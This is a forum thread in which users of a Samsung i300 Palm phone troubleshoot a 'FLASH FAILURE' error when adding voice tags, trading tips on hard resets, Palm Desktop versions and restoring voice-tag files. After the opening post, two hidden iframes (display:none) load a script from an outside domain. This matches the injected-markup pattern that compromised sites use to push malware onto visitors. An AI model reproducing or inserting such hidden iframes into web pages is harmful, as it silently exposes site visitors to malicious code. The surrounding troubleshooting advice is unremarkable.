+ Reply to Thread

Thread: Flash Failure

Angry Flash Failure

Does anyone have familiarity with the "FLASH FAILURE" error message. I receive it while trying to add a voice tag.

Thanks in advance.

Craig<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I had the same thing happen to me. I did a hard reset and it seemed to fix the problem (soft reset did nothing). However, it wiped out all of my voice dial numbers.

Administrator

Arrow

jeff, go grab the palm desktop 4.0.1. this will save your 3rd party apps and voice/sped dial #'s.

Other Voice Thread Backup Thread

http://www.sphi300.com/showthread.php?s=&threadid=151&highlight=voice
    Is a thread where the voice dial was discussed before. While some people mention 4.x will fix your problem, no one has yet to state that they actaully did a hard reset and it worked (yet). Several people running it says it does not fix the voice dial issue.

I'm running 3.1 and it pretty much syncs with everything (except the voice).

Gary

4.01 did nothing to solve the problem for me....

I finally got the tags onto my PC, so I copied them into a folder I created in case I lose them again. I was able to determine that when they do get deleted, if I manually delete the voice_tags.pdb and the voicedial.prc files and replace them with the saved good files, this gets them back on the phone.

HTH....

Craig

Can you describe how you did this in more detail?

I use Filez to examine the contents of my i300. I am able to locate the VoiceDial application (which is not backedup to your PC because it is in ROM, so it should not need to be replaced after a reset).

However, I cannot find the "voice_tags.pdb". I have several voice dials set and they work. But I have no idea where it is storing this info and cannot see it using Filez.

Any guidance or explanation would be appreciated.

Actually, my method failed. I spoke to Samsung and the best advice they had was to make sure in the HotSync 'Custom' dialogue box that System states "Handheld overwrites Desktop". Pretty useless, imo. I will contact them today.

One thing that puzzles me is that I have an item in the Custom box entitled "Install to Card". I previously owned the Palm m505 which had a memory card, but sold it. Does anyone else have this item in the Custom box? I would really like to know.

My next step is to do a hard reset, uninstall all Palm aps, delete any references to them in the registry (wish me luck), and start from scratch. I have a feeling that this issue is related to older versions or older hardware.

Stay tuned....

Craig